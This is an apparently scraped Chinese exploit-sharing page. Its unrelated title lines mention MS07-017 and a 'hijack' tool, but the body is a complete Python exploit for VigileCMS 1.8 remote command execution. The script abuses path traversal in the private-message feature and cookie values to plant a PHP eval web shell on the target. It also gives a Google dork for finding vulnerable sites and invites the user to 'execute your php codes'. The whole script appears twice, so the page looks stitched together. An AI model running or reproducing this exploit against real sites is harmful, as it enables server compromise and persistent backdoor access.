MS07-017 windows 2k and windows xp sp2 真正修改能用版本
渗透工具hijack使用及下载
November 27, 2007 12:33 | by
Google Dork-> Powered by Cms Vigile
------------------------------------------------------------------------------------------------
Use this exploit at your own risk. You are responsible for your own deeds.
Not tested on version < of 1.6
------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------
Use this exploit at your own risk. You are responsible for your own deeds.
Not tested on version < of 1.6
------------------------------------------------------------------------------------------------
Use your brain, do not lame. Enjoy. =)
'''
#Python exploit starts:
#Version 2 of this exploit. Not the one published on some sites.
import sys, httplib, urllib
print "\n################################################"
print " VigileCMS <= 1.8 Stealth "
print " Remote Command Execution "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " %s [Target] [Path] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
print " "
print " You may have to set other options in the "
print " code, like port if it isn't 80 "
print " or options for old viglecms' versions. "
print " "
print "################################################\n"
if len(sys.argv)<=1: sys.exit()
else: print "[.]Exploit Starting."
#Some Vars
old = 0 #set to 1 if you are trying to exploit a 1.6 vigile cms version
port = 80
db = "db" #Directory of database
target = sys.argv[1]
try:directory = sys.argv[2]
except IndexError:directory = "/"
#Starting
try:
#Verifing /db/index.php
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "%s%s/index.php" % (directory,db))
r1 = conn.getresponse()
print "Verifing existence of-> %s%s%s/index.php" % (target,directory,db),r1.status, r1.reason
if r1.status == 404:
print "[-]%s/index.php not found (404)." % (db)
ver1 = "no"
conn.close()
#Verifing /pm/index.php
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "%s%s/pm/index.php" % (directory,db))
r1 = conn.getresponse()
print "Verifing existence of-> %s%s%s/pm/index.php" % (target,directory,db),r1.status, r1.reason
if r1.status == 404:
print"[-]%s/pm/index.php not found (404)." % (db)
ver2 = "no"
except httplib.ResponseNotReady:
sys.exit("[-]ResponseNotReady. Aborted. Check your connection.")
if old == 1:
pt = "/"
pt2 = "?"
else:
pt = "?"
pt2 = "&"
if ver1 == "no" or ver2 == "no":
transversal = ".."
print "[-]One or more Get request returned 404 error. Trying to continue with / path."
else : transversal = ""
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': transversal +'/../<?php eval(stripslashes($_GET[dox])); ?>.paradox-got-this-one.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F; rem_pass=%2Findex;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #1 -->",response.status, response.reason
conn.close()
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': transversal +'/../igotyourbox.php' , 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user="+ transversal +"%2F..%2F%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E; rem_pass=paradox-got-this-one;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #2 -->",response.status, response.reason
conn.close()
try:
if transversal == "..": path = "%sigotyourbox.php" % (directory)
elif transversal == "": path = "%s%s/igotyourbox.php" % (directory,db)
conn = httplib.HTTPConnection(target,port)
conn.request("GET", path)
r1 = conn.getresponse()
conn.close()
except httplib.ResponseNotReady:
sys.exit("[-]ResponseNotReady. Aborted.")
print "[.]Verifing Exploit Success..."
if r1.status == 404:
sys.exit("[-]Exploit Failed.")
else:
print "[+]Done.\n[+]Removing the page..."
conn = httplib.HTTPConnection(target,port)
getrm = path + "?dox=unlink('%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E.paradox-got-this-one.php');"
conn.request("GET", getrm)
print "[+]Success :D Exploited.\n\n A PHP Page Has Been Created -> %s%s \n With Content:\n <?php eval(stripslashes($_GET[dox])); ?>\n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,path)
'''
#Python exploit starts:
#Version 2 of this exploit. Not the one published on some sites.
import sys, httplib, urllib
print "\n################################################"
print " VigileCMS <= 1.8 Stealth "
print " Remote Command Execution "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " %s [Target] [Path] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
print " "
print " You may have to set other options in the "
print " code, like port if it isn't 80 "
print " or options for old viglecms' versions. "
print " "
print "################################################\n"
if len(sys.argv)<=1: sys.exit()
else: print "[.]Exploit Starting."
#Some Vars
old = 0 #set to 1 if you are trying to exploit a 1.6 vigile cms version
port = 80
db = "db" #Directory of database
target = sys.argv[1]
try:directory = sys.argv[2]
except IndexError:directory = "/"
#Starting
try:
#Verifing /db/index.php
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "%s%s/index.php" % (directory,db))
r1 = conn.getresponse()
print "Verifing existence of-> %s%s%s/index.php" % (target,directory,db),r1.status, r1.reason
if r1.status == 404:
print "[-]%s/index.php not found (404)." % (db)
ver1 = "no"
conn.close()
#Verifing /pm/index.php
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "%s%s/pm/index.php" % (directory,db))
r1 = conn.getresponse()
print "Verifing existence of-> %s%s%s/pm/index.php" % (target,directory,db),r1.status, r1.reason
if r1.status == 404:
print"[-]%s/pm/index.php not found (404)." % (db)
ver2 = "no"
except httplib.ResponseNotReady:
sys.exit("[-]ResponseNotReady. Aborted. Check your connection.")
if old == 1:
pt = "/"
pt2 = "?"
else:
pt = "?"
pt2 = "&"
if ver1 == "no" or ver2 == "no":
transversal = ".."
print "[-]One or more Get request returned 404 error. Trying to continue with / path."
else : transversal = ""
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': transversal +'/../<?php eval(stripslashes($_GET[dox])); ?>.paradox-got-this-one.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F; rem_pass=%2Findex;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #1 -->",response.status, response.reason
conn.close()
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': transversal +'/../igotyourbox.php' , 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user="+ transversal +"%2F..%2F%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E; rem_pass=paradox-got-this-one;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #2 -->",response.status, response.reason
conn.close()
try:
if transversal == "..": path = "%sigotyourbox.php" % (directory)
elif transversal == "": path = "%s%s/igotyourbox.php" % (directory,db)
conn = httplib.HTTPConnection(target,port)
conn.request("GET", path)
r1 = conn.getresponse()
conn.close()
except httplib.ResponseNotReady:
sys.exit("[-]ResponseNotReady. Aborted.")
print "[.]Verifing Exploit Success..."
if r1.status == 404:
sys.exit("[-]Exploit Failed.")
else:
print "[+]Done.\n[+]Removing the page..."
conn = httplib.HTTPConnection(target,port)
getrm = path + "?dox=unlink('%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E.paradox-got-this-one.php');"
conn.request("GET", getrm)
print "[+]Success :D Exploited.\n\n A PHP Page Has Been Created -> %s%s \n With Content:\n <?php eval(stripslashes($_GET[dox])); ?>\n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,path)
